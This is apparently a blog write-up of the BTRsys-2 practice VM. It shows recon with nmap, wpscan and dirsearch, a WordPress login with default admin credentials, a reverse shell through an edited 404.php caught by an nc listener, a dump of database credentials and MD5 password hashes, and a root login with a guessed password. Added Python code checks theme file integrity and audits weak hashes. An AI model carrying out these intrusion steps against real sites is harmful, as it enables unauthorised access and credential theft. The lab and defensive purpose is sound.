BTRsys-2 VM


Information gathering

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.153
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 01:26 EDT
Nmap scan report for 192.1.1.153
Host is up (0.00062s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:96:CA:48 (VMware)
```

Ports 21, 22 and 80 are open.

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80 192.1.1.153
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-18 01:27 EDT
Nmap scan report for 192.1.1.153
Host is up (0.00035s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.1.1.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
|_ 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_Hackers
MAC Address: 00:0C:29:96:CA:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

robots.txt was found, anonymous FTP login is allowed, and the OS is Ubuntu. Check whether the FTP share holds any sensitive files.

```
┌──(kali㉿kali)-[~]
└─$ ftp 192.1.1.153
Connected to 192.1.1.153.
220 (vsFTPd 3.0.3)
Name (192.1.1.153:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -liah
229 Entering Extended Passive Mode (|||7107|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 118 4096 Mar 20 2017 .
drwxr-xr-x 2 0 118 4096 Mar 20 2017 ..
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> exi
221 Goodbye.
```

The FTP share is empty.

Directory brute-forcing

Try directory brute-forcing and, at the same time, fetch robots.txt.

```
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u http://192.1.1.153/
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.1.1.153/

[01:59:54] Starting:

[01:59:58] 200 - 224B - /CHANGELOG
[01:59:58] 200 - 34KB - /COPYING
[01:59:58] 200 - 1KB - /INSTALL
[01:59:59] 200 - 2KB - /LICENSE
[01:59:59] 200 - 954B - /README.md
[02:00:12] 200 - 81B - /index.html
[02:00:13] 301 - 315B - /javascript -> http://192.1.1.153/javascript/
[02:00:19] 200 - 1KB - /robots.txt
[02:00:20] 403 - 299B - /server-status
[02:00:20] 403 - 300B - /server-status/
[02:00:23] 301 - 311B - /upload -> http://192.1.1.153/upload/
[02:00:23] 500 - 67B - /upload/
[02:00:25] 200 - 2KB - /wordpress/wp-login.php
[02:00:25] 200 - 8KB - /wordpress/
```

A wordpress path was found; robots.txt also points to the wordpress path.

Gathering information with wpscan

The page renders a little oddly when visiting this directory, but that is not a big deal; try wpscan to gather information.

```
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://btrisk.com/wordpress/ -e ap,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | |_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.24
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://btrisk.com/wordpress/ [192.1.1.153]
[+] Started: Mon Sep 18 02:05:54 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://btrisk.com/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://btrisk.com/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://btrisk.com/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://btrisk.com/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 3.9.14 identified (Insecure, released on 2016-09-07).
| Found By: Rss Generator (Passive Detection)
| - http://btrisk.com/wordpress/?feed=rss2, <generator>http://wordpress.org/?v=3.9.14</generator>
| - http://btrisk.com/wordpress/?feed=comments-rss2, <generator>http://wordpress.org/?v=3.9.14</generator>

[+] WordPress theme in use: twentyfourteen
| Location: http://btrisk.com/wordpress/wp-content/themes/twentyfourteen/
| Latest Version: 3.6
| Last Updated: 2023-03-29T00:00:00.000Z
| Style URL: http://btrisk.com/wordpress/wp-content/themes/twentyfourteen/style.css?ver=3.9.14
|
| Found By: Css Style In Homepage (Passive Detection)
|
| The version could not be determined.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
| Location: http://btrisk.com/wordpress/wp-content/plugins/mail-masta/
| Latest Version: 1.0 (up to date)
| Last Updated: 2014-09-19T07:52:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://btrisk.com/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] btrisk
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
```

Searching for plugin vulnerabilities

The local file inclusion vulnerability turns out to be present, while exploiting the SQL injection vulnerability ran into some problems.

Although this vulnerability exists, the configuration file cannot be reached through it.

WordPress brute-forcing

Brute-forcing is the only option left; try the admin account first.

Surprisingly it succeeded: the username and the password are both admin.

Editing 404.php

Reverse shell

Start the listener in advance, then visit this link: http://btrisk.com/wordpress/wp-content/themes/twentyfourteen/404.php

```
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.153] 48192
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
23:14:19 up 49 min, 0 users, load average: 0.01, 0.13, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:96:ca:48 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.153/24 brd 192.1.1.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe96:ca48/64 scope link
valid_lft forever preferred_lft forever
$ uname -a
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
$ which python
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/$ sudo -l
sudo -l
[sudo] password for www-data:
```
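The edit to 404.php above is exactly what `define('DISALLOW_FILE_EDIT', true);` in wp-config.php prevents, since it removes the theme and plugin editors from the dashboard. The Python below is an added example, not code from the write-up: it baselines a theme directory with SHA-256 and reports what changed, so a rewritten 404.php stands out even where the editor is still enabled; the directory it walks here is a constructed temporary stand-in for wp-content/themes/twentyfourteen.

```python
import hashlib
import os
import tempfile

def file_digest(path):
    """SHA-256 of one file, read in chunks so large media files are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(theme_dir):
    """Map each file's path relative to theme_dir to its SHA-256."""
    digests = {}
    for root, _, files in os.walk(theme_dir):
        for name in files:
            full = os.path.join(root, name)
            digests[os.path.relpath(full, theme_dir)] = file_digest(full)
    return digests

def diff_snapshots(baseline, current):
    """Return (added, modified, removed) relative paths, each sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, modified, removed

def demo():
    """Constructed stand-in for the theme directory, not the real twentyfourteen files."""
    with tempfile.TemporaryDirectory() as theme:
        for name, body in {"404.php": "<?php get_header(); ?>", "style.css": "/* theme */"}.items():
            with open(os.path.join(theme, name), "w") as f:
                f.write(body)
        baseline = snapshot(theme)  # taken right after a clean install
        # Replay the write-up's edit of 404.php through the theme editor, plus a
        # constructed extra file so the 'added' case is exercised as well.
        with open(os.path.join(theme, "404.php"), "w") as f:
            f.write("<?php /* replaced content */ ?>")
        with open(os.path.join(theme, "dropped.php"), "w") as f:
            f.write("<?php ?>")
        return diff_snapshots(baseline, snapshot(theme))

if __name__ == "__main__":
    added, modified, removed = demo()
    print("added:", added, "modified:", modified, "removed:", removed)
```

Store the baseline off-host (or at least outside the web root), since anything www-data can write it can also re-baseline.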

Privilege escalation

The reverse shell worked. Take a look at the web root; there is quite a lot there. Check the wordpress directory first, since it holds the configuration file.

```
www-data@ubuntu:/var/www/html$ ls -alih
ls -alih
total 2.1M
13578 drwxrwxrwx 5 root root 4.0K Apr 27 2017 .
13577 drwxrwxrwx 5 root root 4.0K May 2 2017 ..
46 -rw-rw-r-- 1 btrisk 1000 859K Apr 26 2017 1.gif
14397 -rw-rw-r-- 1 btrisk 1000 1.1M Apr 27 2017 2.gif
14955 -rw-rw-r-- 1 btrisk 1000 41K Apr 24 2017 Btrisk1.JPG
14956 -rw-rw-r-- 1 btrisk 1000 85K Apr 24 2017 Btrisk2.JPG
14957 -rw-rw-r-- 1 btrisk 1000 224 Oct 11 2016 CHANGELOG
14958 -rw-rw-r-- 1 btrisk 1000 35K Oct 11 2016 COPYING
14960 -rw-rw-r-- 1 btrisk 1000 1.3K Oct 11 2016 INSTALL
14961 -rw-rw-r-- 1 btrisk 1000 1.7K Oct 11 2016 LICENSE
14962 -rw-rw-r-- 1 btrisk 1000 954 Oct 11 2016 README.md
141029 drwxrwxr-x 2 btrisk 1000 4.0K Apr 24 2017 hsperfdata_tomcat6
14959 -rw-rw-r-- 1 btrisk 1000 81 Apr 27 2017 index.html
14963 -rw-rw-r-- 1 btrisk 1000 1.5K Apr 25 2017 robots.txt
141032 drwxrwxr-x 13 btrisk 1000 4.0K Apr 24 2017 upload
16411 drwxrwxr-x 5 btrisk 1000 4.0K Apr 27 2017 wordpress

www-data@ubuntu:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
www-data@ubuntu:/var/www/html/upload$ su
su
Password: rootpassword!

su: Authentication failure
```

The database password was found; tried su to switch user directly with it, but the password is wrong.

Looking at the database

Go into the database and have a look.

```
www-data@ubuntu:/var/www/html/upload$ mysql -uroot -p
mysql -uroot -p
Enter password: rootpassword!

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3488
Server version: 5.7.17-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| deneme |
| mysql |
| performance_schema |
| phpmyadmin |
| sys |
| wordpress |
+--------------------+
7 rows in set (0.00 sec)
```

deneme is empty, so only wordpress is left to check.

```
mysql> use wordpress
use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed

mysql> select * from wp_users
select * from wp_users
-> ;
;
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | root | a318e4507e5a74604aafb45e4741edd3 | btrisk | mdemir@btrisk.com | | 2017-04-24 17:37:04 | | 0 | btrisk |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 | admin | ikaya@btrisk.com | | 2017-04-24 17:37:04 | | 4 | admin |
+----+------------+----------------------------------+---------------+---------------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.00 sec)

mysql> exit
exit
Bye
```

Another username and its password hash were found.

Password reuse

Try switching directly to root.
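Both rows in the dump above carry unsalted 32-character MD5 values rather than WordPress's salted phpass hashes (WordPress only rehashes such a legacy value when that user next logs in), and the admin hash is simply md5('admin'). The audit below is an added example, not part of the write-up: it classifies each user_pass value by format and tests the legacy MD5 ones against the login name, the display name and a constructed list of default guesses, with no cracking tool involved.

```python
import hashlib
import re

# Rows copied from the wp_users dump above: (ID, user_login, user_pass, display_name).
WP_USERS = [
    (1, "root", "a318e4507e5a74604aafb45e4741edd3", "btrisk"),
    (2, "admin", "21232f297a57a5a743894a0e4a801fc3", "admin"),
]

# Constructed list of first guesses; extend it with your own banned-password list.
COMMON_GUESSES = ["admin", "password", "123456", "wordpress"]

LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")

def hash_format(user_pass):
    """Classify a wp_users.user_pass value by its prefix."""
    if user_pass.startswith(("$P$", "$H$")):
        return "phpass"        # portable phpass, the WordPress default for years
    if user_pass.startswith(("$2y$", "$wp$")):
        return "bcrypt"        # bcrypt-based hashes of recent WordPress releases
    if LEGACY_MD5.match(user_pass):
        return "legacy-md5"    # unsalted md5 from old installs, never upgraded
    return "unknown"

def audit_user(user_login, user_pass, display_name):
    """Return a list of findings for one account; an empty list means nothing to report."""
    findings = []
    if hash_format(user_pass) != "legacy-md5":
        return findings
    findings.append("legacy-md5")
    # An unsalted md5 can be checked against obvious guesses directly:
    # the login name, the display name and the constructed default list.
    for guess in sorted({user_login, display_name, *COMMON_GUESSES}):
        if hashlib.md5(guess.encode()).hexdigest() == user_pass:
            findings.append("weak-password:" + guess)
    return findings

def audit(rows):
    """Audit every row and return {user_login: findings}."""
    return {login: audit_user(login, pw, name) for _, login, pw, name in rows}

if __name__ == "__main__":
    for login, findings in audit(WP_USERS).items():
        print(login, findings or "ok")
```

Any account the audit flags should have its password reset, which also replaces the legacy hash with the current format.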

```
www-data@ubuntu:/var/www/html$ su
su
Password: roottoor

root@ubuntu:/var/www/html# cd /root
cd /root
root@ubuntu:~# ls
ls
root@ubuntu:~# ls -alih
ls -alih
total 32K
16 drwx------ 4 root root 4.0K Apr 28 2017 .
2 drwxr-xr-x 22 root root 4.0K Mar 17 2017 ..
11416 -rw------- 1 root root 505 May 2 2017 .bash_history
17 -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
16439 drwx------ 2 root root 4.0K Apr 28 2017 .cache
14287 -rw------- 1 root root 215 Apr 27 2017 .mysql_history
16385 drwxr-xr-x 2 root root 4.0K Mar 21 2017 .nano
18 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
```

There is no flag in the root directory; that's the end of the fight.

https://i3eg1nner.github.io/2023/09/10fdb73312a7.html
Author
I3eg1nner
Published on
18 September 2023
License